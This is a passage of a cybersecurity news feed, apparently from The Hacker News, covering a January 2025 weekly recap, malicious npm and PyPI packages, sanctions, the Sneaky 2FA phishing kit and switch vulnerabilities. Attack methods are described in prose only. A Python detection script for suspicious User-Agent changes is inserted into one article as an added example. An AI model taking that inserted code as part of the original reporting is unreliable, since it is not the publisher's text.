- Enforcement of approval workflows: In many cases, access to most datasets requires approval from data owners or data stewards. Satori makes it easy to implement such a process directly or by integrating with workflow tools like Jira, ServiceNow, or even Slack.

Final words

Satori doesn't just show you where your data is or who has access to it; it helps you actively control it, from production databases to AI models. By automating key tasks like discovering sensitive data, managing permissions, and enforcing access controls, Satori makes protecting data simpler and more effective. For security teams, it's a way to move beyond just mapping data security risks and actually mitigate them.

To learn more about Satori, visit Satori's website or schedule a 1:1 demo meeting.

This article is a contributed piece from one of our valued partners.
  • THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]
    thehackernews.com
    As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with old-school methods.

To stay ahead, we need to understand how cybersecurity is now tied to diplomacy, where the safety of networks is just as important as the power of words.

Threat of the Week

U.S. Treasury Sanctions Chinese and North Korean Entities
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) leveled sanctions against a Chinese cybersecurity company (Sichuan Juxinhe Network Technology Co., LTD.) and a Shanghai-based cyber actor (Yin Kecheng) over their alleged links to the Salt Typhoon and Silk Typhoon threat clusters. Kecheng was associated with the breach of the Treasury's own network that came to light earlier this month. The department has also sanctioned two individuals and four organizations in connection with the North Korean fraudulent IT worker scheme, which aims to generate revenue for the country by dispatching its citizens to China and Russia to obtain employment at various companies across the world using false identities.

Top News

Sneaky 2FA Phishing Kit Targets Microsoft 365 Accounts
A new adversary-in-the-middle (AitM) phishing kit called Sneaky 2FA has seen moderate adoption among malicious actors for its ability to steal credentials and two-factor authentication (2FA) codes from Microsoft 365 accounts since at least October 2024. The phishing kit is also called WikiKit owing to the fact that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page. Sneaky 2FA also shares some code overlaps with another phishing kit maintained by the W3LL Store.

FBI Deletes PlugX Malware from Over 4,250 Computers
The U.S. Department of Justice (DoJ) disclosed that a court-authorized operation allowed the Federal Bureau of Investigation (FBI) to delete a variant of the PlugX malware from over 4,250 infected computers as part of a "multi-month law enforcement operation." The malware, attributed to the China-nexus Mustang Panda threat actor, is known to spread to other systems via attached USB devices. The disruption is part of a larger effort led by the Paris Prosecutor's Office and cybersecurity firm Sekoia that has resulted in the disinfection payload being sent to 5,539 IP addresses across 10 countries.

Russian Hackers Target Kazakhstan With HATVIBE Malware
The Russian threat actor known as UAC-0063 has been attributed to an ongoing cyber espionage campaign targeting Kazakhstan as part of the Kremlin's efforts to gather economic and political intelligence in Central Asia. The spear-phishing attacks leverage lures related to the Ministry of Foreign Affairs to drop a malware loader named HATVIBE that's then used to deploy a backdoor called CHERRYSPY.

Python Backdoor Leads to RansomHub Ransomware
Cybersecurity researchers have detailed an attack that started with a SocGholish infection, which then paved the way for a Python backdoor responsible for deploying RansomHub encryptors throughout the entire impacted network. The Python script is essentially a reverse proxy that connects to a hard-coded IP address and allows the threat actor to move laterally in the compromised network using the victim system as a proxy.

Google Ads Users Targeted by Malicious Google Ads
In an ironic twist, a new malvertising campaign has been found targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google. The brazen tactic is being used to hijack advertiser accounts and push more ads to perpetuate the campaign further. Google said the activity violates its policies and it's taking active measures to disrupt it.

Trending CVEs

Your go-to software could be hiding dangerous security flaws: don't wait until it's too late! Update now and stay ahead of the threats before they catch you off guard.

This week's list includes CVE-2025-21333, CVE-2025-21334, CVE-2025-21335 (Windows Hyper-V NT Kernel Integration VSP), CVE-2024-55591 (Fortinet), CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159 (Ivanti Endpoint Manager), CVE-2024-7344 (Howyar Taiwan), CVE-2024-52320, CVE-2024-48871 (Planet Technology WGS-804HPT industrial switch), CVE-2024-12084 (Rsync), CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 (SimpleHelp), CVE-2024-44243 (Apple macOS), CVE-2024-9042 (Kubernetes), CVE-2024-12365 (W3 Total Cache plugin), CVE-2025-23013 (Yubico), CVE-2024-57579, CVE-2024-57580, CVE-2024-57581, CVE-2024-57582 (Tenda AC18), CVE-2024-57011, CVE-2024-57012, CVE-2024-57013, CVE-2024-57014, CVE-2024-57015, CVE-2024-57016, CVE-2024-57017, CVE-2024-57018, CVE-2024-57019, CVE-2024-57020, CVE-2024-57021, CVE-2024-57022, CVE-2024-57023, CVE-2024-57024, CVE-2024-57025 (TOTOLINK X5000R), CVE-2025-22785 (ComMotion Course Booking System plugin), and 44 vulnerabilities in Wavlink AC3000 routers.

Around the Cyber World

Threat Actors Advertise Insider Threat Operations
Bad actors have been identified advertising services on Telegram and dark web forums that aim to connect prospective customers with insiders as well as recruit people working at various companies for malicious purposes. According to Nisos, some of the messages posted on Telegram request insider access to Amazon in order to remove negative product reviews. Others offer insider services to process refunds. "In one example, the threat actors posted that they would connect buyers to an insider working at Amazon, who could perform services for a fee," Nisos said. "The threat actors clarified that they were not the insider, but had access to one."

U.K. Proposes Banning Ransom Payments by Government Entities
The U.K. government is proposing that all public sector bodies and critical national infrastructure, including the NHS, local councils, and schools, refrain from making ransomware payments in an attempt to hit where it hurts and disrupt the financial motivation behind such attacks. "This is an expansion of the current ban on payments by government departments," the government said. "This is in addition to making it mandatory to report ransomware incidents, to boost intelligence available to law enforcement and help them disrupt more incidents."

Gravy Analytics Breach Leaks Sensitive Location Data
Gravy Analytics, a bulk location data provider that has offered its services to government agencies and law enforcement through its Venntel subsidiary, revealed that it suffered a hack and data breach, thereby threatening the privacy of millions of people around the world who had their location information revealed by thousands of Android and iOS apps to the data broker. It's believed that the threat actors gained access to the AWS environment through a "misappropriated" key. Gravy Analytics said it was informed of the hack through communication from the threat actors on January 4, 2025. A small sample data set has since been published in a Russian forum containing data for "tens of millions of data points worldwide," Predicta Lab CEO Baptiste Robert said. Much of the data collection is occurring through the advertising ecosystem, specifically a process called real-time bidding (RTB), suggesting that even app developers may not be aware of the practice. That said, it's currently unclear how Gravy Analytics put together the massive trove of location data, and whether the company collected the data itself or from other data brokers. News of the breach comes weeks after the Federal Trade Commission banned Gravy Analytics and Venntel from collecting and selling Americans' location data without consumers' consent.

CISA Issues a Series of Security Guidance
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging Operational Technology (OT) owners and operators to integrate secure-by-design elements into their procurement process by selecting manufacturers who prioritize security and meet various compliance standards. It's also advising companies to better detect and defend against advanced intrusion techniques by making use of Microsoft's newly introduced expanded cloud logs in Purview Audit (Standard). Separately, the agency has updated its Product Security Bad Practices guide to include three new bad practices on the use of known insecure or deprecated cryptographic functions, hard-coded credentials, and product support periods. "Software manufacturers should clearly communicate the period of support for their products at the time of sale," CISA said. "Software manufacturers should provide security updates through the entire support period." Lastly, it called on the U.S. government to take the necessary steps to bolster cybersecurity by closing the software understanding gap that, combined with the lack of secure-by-design software, can lead to the exploitation of vulnerabilities. The guidance comes as the European Union's Digital Operational Resilience Act, or DORA, entered into effect on January 17, 2025, requiring both financial services firms and their technology suppliers to improve their cybersecurity posture.

Researchers Demonstrate Antifuse-based OTP Memory Attack
A new study has found that data bits stored in an off-the-shelf Synopsys antifuse memory block used in Raspberry Pi's RP2350 microcontroller for storing secure boot keys and other sensitive configuration data can be extracted, thereby compromising secrets. The method relies on a "well-known semiconductor failure analysis technique: passive voltage contrast (PVC) with a focused ion beam (FIB)," IOActive said, adding that "the simple form of the attack demonstrated here recovers the bitwise OR of two physically adjacent memory bitcell rows sharing common metal 1 contacts." In a hypothetical physical cyber attack, an adversary in possession of an RP2350 device, as well as access to semiconductor deprocessing equipment and a focused ion beam (FIB) system, could extract the contents of the antifuse bit cells as plaintext in a matter of days.

Biden Administration Issues Executive Order to Improve U.S. Cybersecurity
Outgoing U.S. President Joe Biden signed a sweeping executive order that calls for securing federal communications networks against foreign adversaries; issuing tougher sanctions for ransomware gangs; requiring software and cloud providers to develop more secure products and follow secure software development practices; enabling encryption by default across email, instant messaging, and internet-based voice and video conferencing; adopting quantum-resistant encryption within existing networks; and using artificial intelligence (AI) to boost America's cyber defense capabilities. In a related development, the Commerce Department finalized a rule banning the sale or import of connected passenger vehicles that integrate certain software or hardware components from China or Russia. "Connected vehicles yield many benefits, but software and hardware sources from the PRC and other countries of concern pose grave national security risks," said National Security Advisor Jake Sullivan, noting the rule aims to protect its critical infrastructure and automotive supply chain. The White House said the move will help the U.S. defend itself against Chinese cyber espionage and intrusion operations. Over the past week, the Biden administration has also released an Interim Final Rule on Artificial Intelligence Diffusion that seeks to prevent the misuse of advanced AI technology by countries of concern.

Expert Webinar

Simplify, Automate, Secure: Digital Trust for Enterprises
Managing digital trust isn't just a challenge; it's mission-critical. Hybrid systems, DevOps workflows, and compliance demands have outgrown traditional tools. DigiCert ONE is here to change the game. In this webinar, you'll discover how to:

- Simplify: Centralized certificate management to reduce complexity and risk.
- Automate: Streamline trust operations across systems.
- Secure: Meet compliance demands with advanced tools.
- Modernize: Keep up with DevOps with smarter software signing.

From IoT to enterprise IT, DigiCert ONE equips you to secure every stage of digital trust.

P.S. Know someone who could use this? Share it.

Cybersecurity Tools

- AD-ThreatHunting: Detect and stop threats like password sprays, brute force attacks, and admin misuse with real-time alerts, pattern recognition, and smart analysis tools. With features like customizable thresholds, off-hours monitoring, and multi-format reporting, staying secure has never been easier. Plus, test your defenses with built-in attack simulations to ensure your system is always ready.
- OSV-SCALIBR: A powerful open-source library that builds on Google's expertise in vulnerability management, offering tools to secure your software at scale. It supports scanning installed packages, binaries, and source code across Linux, Windows, and Mac, while also generating SBOMs in SPDX and CycloneDX formats. With advanced features like container scanning, weak credential detection, and optimization for resource-constrained environments, OSV-SCALIBR makes it easier than ever to identify and manage vulnerabilities.

Tip of the Week

Monitor, Detect, and Control Access with Free Solutions
In today's complex threat landscape, advanced, cost-effective solutions like Wazuh and LAPS offer powerful defenses for small-to-medium enterprises. Wazuh, an open-source SIEM platform, integrates with the Elastic Stack for real-time threat detection, anomaly monitoring, and log analysis, enabling you to spot malicious activities early. Meanwhile, LAPS (Local Administrator Password Solution) automates the rotation and management of local admin passwords, reducing the risk of privilege escalation and ensuring that only authorized users can access critical systems. Together, these tools provide a robust, multi-layered defense strategy, giving you the ability to detect, respond to, and mitigate threats efficiently without the high cost of enterprise solutions.

Conclusion

The digital world is full of challenges that need more than just staying alert; they need new ideas, teamwork, and toughness. With threats coming from governments, hackers, and even people inside organizations, the key is to be proactive and work together. This recap's events show us that cybersecurity is about more than defense; it's about creating a safe and trustworthy future for technology.
  • Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP
    thehackernews.com
    Jan 20, 2025 | Ravie Lakshmanan | Supply Chain Attack / Solana

Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repositories that come with capabilities to steal data and even delete sensitive data from infected systems.

The list of identified packages is below:

- @async-mutex/mutex, a typosquat of async-mute (npm)
- dexscreener, which masquerades as a library for accessing liquidity pool data from decentralized exchanges (DEXs) and interacting with the DEX Screener platform (npm)
- solana-transaction-toolkit (npm)
- solana-stable-web-huks (npm)
- cschokidar-next, a typosquat of chokidar (npm)
- achokidar-next, a typosquat of chokidar (npm)
- achalk-next, a typosquat of chalk (npm)
- csbchalk-next, a typosquat of chalk (npm)
- cschalk, a typosquat of chalk (npm)
- pycord-self, a typosquat of discord.py-self (PyPI)

Supply chain security company Socket, which discovered the packages, said the first four packages are designed to intercept Solana private keys and transmit them through Gmail's Simple Mail Transfer Protocol (SMTP) servers with the likely goal of draining victims' wallets.

In particular, the packages solana-transaction-toolkit and solana-stable-web-huks programmatically deplete the wallet, automatically transferring up to 98% of its contents to an attacker-controlled Solana address, while claiming to offer Solana-specific functionality.

"Because Gmail is a trusted email service, these exfiltration attempts are less likely to be flagged by firewalls or endpoint detection systems, which treat smtp.gmail.com as legitimate traffic," security researcher Kirill Boychenko said.

Socket said it also came across two GitHub repositories published by the threat actors behind solana-transaction-toolkit and solana-stable-web-huks that purport to contain Solana development tools or scripts for automating common DeFi workflows, but, in reality, import the threat actor's malicious npm packages. The GitHub accounts associated with these repositories, "moonshot-wif-hwan" and "Diveinprogramming," are no longer accessible.

"A script in the threat actor's GitHub repository, moonshot-wif-hwan/pumpfun-bump-script-bot, is promoted as a bot for trading on Raydium, a popular Solana-based DEX, but instead it imports malicious code from solana-stable-web-huks package," Boychenko said.

The use of malicious GitHub repositories illustrates the attackers' attempts to stage a broader campaign beyond npm by targeting developers who might be searching for Solana-related tools on the Microsoft-owned code hosting platform.

The second set of npm packages has been found to take its malicious functionality to the next level by incorporating a "kill switch" function that recursively wipes all files in project-specific directories, in addition to exfiltrating environment variables to a remote server in some cases.

The counterfeit csbchalk-next package functions identically to the typosquatted versions of chokidar, the only difference being that it initiates the data deletion operation only after it receives the code "202" from the server.

Pycord-self, on the other hand, singles out Python developers looking to integrate Discord APIs into their projects, capturing Discord authentication tokens and connecting to an attacker-controlled server for persistent backdoor access post-installation on both Windows and Linux systems.

The development comes as bad actors are targeting Roblox users with fraudulent libraries engineered to facilitate data theft using open-source stealer malware such as Skuld and Blank-Grabber. Last year, Imperva revealed that Roblox players on the lookout for game cheats and mods have also been targeted by bogus PyPI packages that trick them into downloading the same payloads.
  • TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025
    thehackernews.com
    Jan 19, 2025 | Ravie Lakshmanan | Social Media / Data Privacy

Popular video-sharing social network TikTok has officially gone dark in the United States as a federal ban on the app comes into effect on January 19, 2025.

"We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible, and we appreciate your support. Please stay tuned."

An immediate outcome of the ban is that existing users will no longer be able to access TikTok content, and new users won't be able to download the app from the official app stores for Android and iOS. Other apps from its parent company ByteDance, including CapCut, Lemon8, and Gauth, have become unavailable as well.

The development comes days after the U.S. Supreme Court ruled unanimously to uphold a law requiring that ByteDance sell TikTok or see it effectively blocked in the country, citing national security reasons and fears that its recommendation algorithm could be vulnerable to manipulation by Chinese authorities.

The court further noted that TikTok's scale and susceptibility to foreign adversary control, coupled with the vast amounts of personal information that it collects about users, merits "differential treatment" with regard to First Amendment rights.

"There is no doubt that, for more than 170 million Americans, TikTok offers a distinctive and expansive outlet for expression, means of engagement, and source of community," the court wrote in its decision. "But Congress has determined that divestiture is necessary to address its well-supported national security concerns regarding TikTok's data collection practices and relationship with a foreign adversary."

Following the ruling, the White House said TikTok should remain available to U.S. users either under American ownership or another entity that addresses the national security concerns identified by Congress in developing the law. The legislation was formally passed in April 2024.

The law was the culmination of a yearslong debate that TikTok's Chinese ownership raises the risk that data on U.S. users could fall into the hands of Beijing or be used for pushing propaganda. TikTok has repeatedly maintained it operates independently of the government and has not received any requests about its data, while ByteDance has said it has no plans to divest the business.

"The Court's decision enables the Justice Department to prevent the Chinese government from weaponizing TikTok to undermine America's national security," said Attorney General Garland. "Authoritarian regimes should not have unfettered access to millions of Americans' sensitive data."

The Electronic Frontier Foundation (EFF), in a statement, expressed disappointment at the Supreme Court's decision to uphold the TikTok ban, stating there are several ways that America's foes could steal, scrape, or buy its citizens' data.

"The ban or forced sale of one social media app will do virtually nothing to protect Americans' data privacy; only comprehensive consumer privacy legislation can achieve that goal," the EFF said. "Shutting down communications platforms or forcing their reorganization based on concerns of foreign propaganda and anti-national manipulation is an eminently anti-democratic tactic, one that the US has previously condemned globally."

However, there are indications the app may get a reprieve. Speaking to NBC News, U.S. President-elect Donald Trump said on Saturday he would "most likely" give TikTok a 90-day extension from the ban after he takes office on Monday.

TikTok has faced similar issues in several countries, most famously leading to an outright ban in India in June 2020. Late last year, the Canadian government ordered TikTok to dissolve its operations in the country, citing national security risks.

That said, the TikTok blockade has had the unintended consequence of users migrating to other Chinese alternatives such as RedNote (aka Xiaohongshu), rather than Instagram and YouTube, likely posing a fresh challenge for lawmakers concerned about foreign influence or interference via social media.

"I'm concerned that Americans are flocking to a number of adversary-owned social media platforms," Virginia Senator Mark Warner said in a post on Bluesky. "We still need a comprehensive and risk-based approach to assessing and mitigating the risks of foreign-owned apps."
  • U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Silk Typhoon
    thehackernews.com
    Jan 18, 2025 · Ravie Lakshmanan · Cyber Espionage / Telecom Security

    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency.

    "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent targeting of Treasury's information technology (IT) systems, as well as sensitive U.S. critical infrastructure," the Treasury said in a press release.

    The sanctions target Yin Kecheng, who is assessed to have been a cyber actor for over a decade and affiliated with China's Ministry of State Security (MSS). Kecheng, per the Treasury, was associated with the breach of its own network that came to light earlier this month.

    The incident involved a hack of BeyondTrust's systems that allowed the threat actors to infiltrate some of the company's Remote Support SaaS instances by making use of a compromised Remote Support SaaS API key. The activity has been attributed to a nation-state group named Silk Typhoon (formerly Hafnium), which was linked to the exploitation of multiple then-zero-day security flaws (collectively known as ProxyLogon) in Microsoft Exchange Server in early 2021.

    According to a recent report from Bloomberg, the attackers are said to have broken into no fewer than 400 computers belonging to the Treasury and stolen over 3,000 files, including policy and travel documents, organizational charts, material on sanctions and foreign investment, and 'Law Enforcement Sensitive' data. They also gained unauthorized access to computers used by Secretary Janet Yellen, Deputy Secretary Adewale Adeyemo, and Acting Under Secretary Bradley T. Smith, as well as material on investigations run by the Committee on Foreign Investment in the U.S., the report added.

    It's believed that Silk Typhoon overlaps with a cluster tracked by Google-owned Mandiant under the moniker UNC5221, a China-nexus espionage actor known for its extensive weaponization of Ivanti zero-day vulnerabilities. The Hacker News has reached out to Mandiant for further comment, and we will update the story if we hear back.

    The sanctions also target Sichuan Juxinhe Network Technology Co., LTD., a Sichuan-based cybersecurity company that the Treasury said was directly involved in a series of cyber attacks aimed at major U.S. telecommunication and internet service provider companies. The activity has been associated with a different Chinese hacking group named Salt Typhoon (aka Earth Estries, FamousSparrow, GhostEmperor, and UNC2286). The threat actor is estimated to have been active since at least 2019.

    "The MSS has maintained strong ties with multiple computer network exploitation companies, including Sichuan Juxinhe," the Treasury said.

    Separately, the Department of State's Rewards for Justice program is offering a reward of up to $10 million for information that could lead to the identification or location of any individuals who are acting at the direction or under the control of a foreign state-sponsored adversary and engage in malicious cyber activities against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act.

    "The Treasury Department will continue to use its authorities to hold accountable malicious cyber actors who target the American people, our companies, and the United States government, including those who have targeted the Treasury Department specifically," Adeyemo said in a statement.

    The attacks on U.S. telecom service providers have since prompted the Federal Communications Commission (FCC) to issue new rules requiring companies operating in the sector to secure their networks from unlawful access or interception of communications. Outgoing FCC chairwoman Jessica Rosenworcel described the hacks as "one of the largest intelligence compromises ever seen."

    "That action is accompanied by a proposal to require communications service providers to submit an annual certification to the FCC attesting that they have created, updated, and implemented a cybersecurity risk management plan, which would strengthen communications from future cyber attacks," the FCC said.

    Earlier this week, Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said "China's sophisticated and well-resourced cyber program represents the most serious and significant cyber threat to our nation, and in particular, U.S. critical infrastructure."

    Easterly also revealed that Salt Typhoon was first detected on federal networks, well before the cyber espionage group burrowed into the networks of AT&T, Lumen Technologies, T-Mobile, Verizon, and other providers.

    The designations are just the latest in a long list of moves made by the Treasury in a bid to combat malicious cyber activity by Chinese threat actors. Previously sanctioned by the agency are three other companies: Integrity Technology Group (Flax Typhoon), Sichuan Silence Information Technology (Pacific Rim), and Wuhan Xiaoruizhi Science and Technology Company (APT31).
  • New 'Sneaky 2FA' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code Bypass
    thehackernews.com
    Jan 17, 2025 · Ravie Lakshmanan · Cybersecurity / Threat Intelligence

    Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that has been targeting Microsoft 365 accounts since at least October 2024 with the aim of stealing credentials and two-factor authentication (2FA) codes.

    The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting Sneaky 2FA phishing pages have been identified as of this month, suggesting moderate adoption by threat actors.

    "This kit is being sold as phishing-as-a-service (PhaaS) by the cybercrime service 'Sneaky Log,' which operates through a fully-featured bot on Telegram," the company said in an analysis. "Customers reportedly receive access to a licensed obfuscated version of the source code and deploy it independently."

    Phishing campaigns have been observed sending payment receipt-related emails to entice recipients into opening bogus PDF documents containing a QR code that, upon scanning, redirects them to Sneaky 2FA pages.

    Sekoia said the phishing pages are hosted on compromised infrastructure, mostly involving WordPress websites and other domains controlled by the attacker. The fake authentication pages are designed to automatically populate the victim's email address to elevate their legitimacy.

    The kit also boasts several anti-bot and anti-analysis measures, employing techniques like traffic filtering and Cloudflare Turnstile challenges to ensure that only victims who meet certain criteria are directed to the credential harvesting pages. It further runs a series of checks to detect and resist analysis attempts using web browser developer tools. A notable aspect of the PhaaS is that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page using the href[.]li redirection service. This has led TRAC Labs to give it the name WikiKit.

    "The Sneaky 2FA phishing kit employs several blurred images as the background for its fake Microsoft authentication pages," Sekoia explained. "By using screenshots of legitimate Microsoft interfaces, this tactic is intended to deceive users into authenticating themselves to gain access to the blurred content."

    Further investigation has revealed that the phishing kit relies on a check with a central server, likely the operator's, that makes sure the subscription is active. This indicates that only customers with a valid license key can use Sneaky 2FA to conduct phishing campaigns. The kit is advertised for $200 per month.

    That's not all. Source code references have also been unearthed pointing to a phishing syndicate named W3LL Store, which was previously exposed by Group-IB in September 2023 as being behind a phishing kit called W3LL Panel and various tools for conducting business email compromise (BEC) attacks. This, along with similarities in the AitM relay implementation, has also raised the possibility that Sneaky 2FA may be based on the W3LL Panel. The latter also operates under a similar licensing model that requires periodic checks with a central server.

    In an interesting twist, some of the Sneaky 2FA domains were previously associated with known AitM phishing kits, such as Evilginx2 and Greatness, an indication that at least a few cyber criminals have migrated to the new service.

    "The phishing kit uses different hardcoded User-Agent strings for the HTTP requests depending on the step of the authentication flow," Sekoia researchers said. "This behavior is rare in legitimate user authentication, as a user would have to perform successive steps of the authentication from different web browsers."

    "While User-Agent transitions occasionally happen in legitimate situations (e.g., authentication initiated in desktop applications that launch a web browser or WebView to handle MFA), the specific sequence of User-Agents used by Sneaky 2FA does not correspond to a realistic scenario, and offers a high-fidelity detection of the kit."
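The User-Agent observation above translates directly into a sign-in log detection: group the steps of one authentication flow by a correlation id and flag flows whose User-Agent changes between steps, while down-ranking the one transition Sekoia names as legitimate (a desktop client handing MFA to an embedded browser). The following is an added example, not Sekoia's code or the kit's actual strings; the log format, the correlation field and the User-Agent values are constructed for illustration, and the "known handoff" list is an assumption an analyst would tune to their own clients.

```python
"""Flag authentication flows whose User-Agent changes between steps.

Added example, not Sekoia's tooling. The sign-in records below are
constructed; the User-Agent strings are placeholders, not Sneaky 2FA's
hardcoded values.
"""
import json
from collections import defaultdict

# Constructed sample: newline-delimited JSON, one record per step of a
# sign-in flow, with a per-flow correlation id ("corr").
SAMPLE_LOG = """
{"corr": "s1", "step": "username", "ua": "Mozilla/5.0 (Windows NT 10.0) Firefox/133.0", "ts": 1}
{"corr": "s1", "step": "password", "ua": "Mozilla/5.0 (Windows NT 10.0) Firefox/133.0", "ts": 2}
{"corr": "s1", "step": "mfa", "ua": "Mozilla/5.0 (Windows NT 10.0) Firefox/133.0", "ts": 3}
{"corr": "s2", "step": "username", "ua": "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0", "ts": 4}
{"corr": "s2", "step": "password", "ua": "Mozilla/5.0 (Macintosh) Safari/605.1.15", "ts": 5}
{"corr": "s2", "step": "mfa", "ua": "Mozilla/5.0 (Windows NT 10.0) Edge/120.0", "ts": 6}
{"corr": "s3", "step": "username", "ua": "Outlook/16.0 (Windows)", "ts": 7}
{"corr": "s3", "step": "mfa", "ua": "Mozilla/5.0 (Windows NT 10.0) WebView Chrome/120.0", "ts": 8}
"""

# Transitions that do occur legitimately: a desktop client launching an
# embedded browser for MFA. Substrings are illustrative assumptions.
LEGIT_HANDOFF = [("Outlook/", "WebView")]


def parse_log(text):
    """Group records by correlation id, ordered by timestamp."""
    flows = defaultdict(list)
    for line in text.strip().splitlines():
        if line.strip():
            rec = json.loads(line)
            flows[rec["corr"]].append(rec)
    for steps in flows.values():
        steps.sort(key=lambda r: r["ts"])
    return flows


def classify_flow(steps):
    """Return 'ok', 'low', 'medium' or 'high' for one authentication flow."""
    uas = []
    for rec in steps:                      # collapse consecutive repeats
        if not uas or uas[-1] != rec["ua"]:
            uas.append(rec["ua"])
    if len(uas) == 1:
        return "ok"                        # one browser for the whole flow
    if len(uas) == 2:
        first, second = uas
        for app, embedded in LEGIT_HANDOFF:
            if app in first and embedded in second:
                return "low"               # known desktop-app to WebView handoff
        return "medium"                    # one unexplained switch
    return "high"                          # three or more distinct browsers


def detect_ua_transitions(text):
    """Map each correlation id in the log to its verdict."""
    return {corr: classify_flow(steps) for corr, steps in parse_log(text).items()}


if __name__ == "__main__":
    for corr, verdict in detect_ua_transitions(SAMPLE_LOG).items():
        print(corr, verdict)
```

Flow s2 switches browser at every step and is the pattern the text describes; s3 is the legitimate desktop-to-WebView case and is kept at low confidence rather than suppressed entirely, so it can still be correlated with other signals such as the request IP.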
  • U.S. Sanctions North Korean IT Worker Network Supporting WMD Programs
    thehackernews.com
    Jan 17, 2025 · Ravie Lakshmanan · Insider Threat / Cryptocurrency

    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions.

    "These IT workers obfuscate their identities and locations to fraudulently obtain freelance employment contracts from clients around the world for IT projects, such as software and mobile application development," the Treasury Department said. "The DPRK government withholds up to 90% of the wages earned by these overseas workers, thereby generating annual revenues of hundreds of millions of dollars for the Kim regime's weapons programs to include weapons of mass destruction (WMD) and ballistic missile programs."

    The action represents the latest salvo in the U.S. government's ongoing efforts to crack down on the various financially motivated streams that aim to further Pyongyang's strategic objectives. The individuals and companies sanctioned by OFAC are listed below:
    - Department 53 of the Ministry of the People's Armed Forces, which is said to generate revenue using front companies related to IT and software development
    - Korea Osong Shipping Co, a Department 53 front company that has maintained DPRK IT workers in Laos since at least 2022
    - Chonsurim Trading Corporation, a Department 53 front company that has maintained another group of DPRK IT workers in Laos
    - Liaoning China Trade Industry Co., Ltd, a China-based company that has shipped Department 53 equipment, viz. notebook and desktop computers, graphics cards, HDMI cables, and network equipment, to facilitate IT worker activity abroad
    - Jong In Chol, the president of Chonsurim's DPRK IT worker delegation in Laos
    - Son Kyong Sik, a China-based chief representative of Korea Osong Shipping Co

    Both front companies are alleged to have used false identities and aliases to communicate with clients and undertake software development work for companies across the world.

    The fraudulent IT worker scheme attracted mainstream attention in 2023, although it's believed that such operations have been ongoing since at least 2018, when the Treasury sanctioned two companies, Yanbian Silverstar and Volasys Silver Star, for the "exportation of workers from North Korea, including exportation to generate revenue for the Government of North Korea or the Workers' Party of Korea."

    The activity cluster is tracked by the cybersecurity community under the monikers Famous Chollima, Nickel Tapestry, UNC5267, and Wagemole.

    Recent analyses have found that North Korean IT workers have been increasingly infiltrating cryptocurrency and Web3 companies and "compromising their networks, operations, and integrity." The insider threat operation has also involved people in the U.S. who are willing to support the scheme by running laptop farms in exchange for a monthly fee.

    Heightened public disclosures about these campaigns have further led to a surge in extortion attempts, in which the workers steal intellectual property from the companies that employ them and demand "more cryptocurrency than they ever have before" for not releasing it publicly or giving it away to rivals, Google-owned Mandiant told The Record.

    That said, the IT worker operation is just one of the many methods North Korea employs to illegally generate revenue. DPRK state-sponsored hacking groups have a long history of targeting developers with job-themed lures to deliver various kinds of malware that are capable of facilitating data and cryptocurrency theft.

    "The DPRK continues to rely on its thousands of overseas IT workers to generate revenue for the regime, to finance its illegal weapons programs, and to enable its support of Russia's war in Ukraine," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence Bradley T. Smith. "The United States remains resolved to disrupt these networks, wherever they operate, that facilitate the regime's destabilizing activities."
  • Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation
    thehackernews.com
    Jan 17, 2025 · Ravie Lakshmanan · Firmware Security / Vulnerability

    Cybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices.

    "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker who is able to remotely control one of these devices can use them to further exploit devices in an internal network and do lateral movement."

    The operational technology security firm, which carried out an extensive analysis of the firmware used in these switches using the QEMU framework, said the vulnerabilities are rooted in the dispatcher.cgi interface used to provide a web service. The list of flaws is below:
    - CVE-2024-52558 (CVSS score: 5.3) - An integer underflow flaw that can allow an unauthenticated attacker to send a malformed HTTP request, resulting in a crash
    - CVE-2024-52320 (CVSS score: 9.8) - An operating system command injection flaw that can allow an unauthenticated attacker to send commands through a malicious HTTP request, resulting in remote code execution
    - CVE-2024-48871 (CVSS score: 9.8) - A stack-based buffer overflow flaw that can allow an unauthenticated attacker to send a malicious HTTP request, resulting in remote code execution

    Successful exploitation of the flaws could permit an attacker to hijack the execution flow by embedding shellcode in the HTTP request and gain the ability to execute operating system commands.

    Following responsible disclosure, the Taiwanese company has rolled out patches for the shortcomings with version 1.305b241111, released on November 15, 2024.
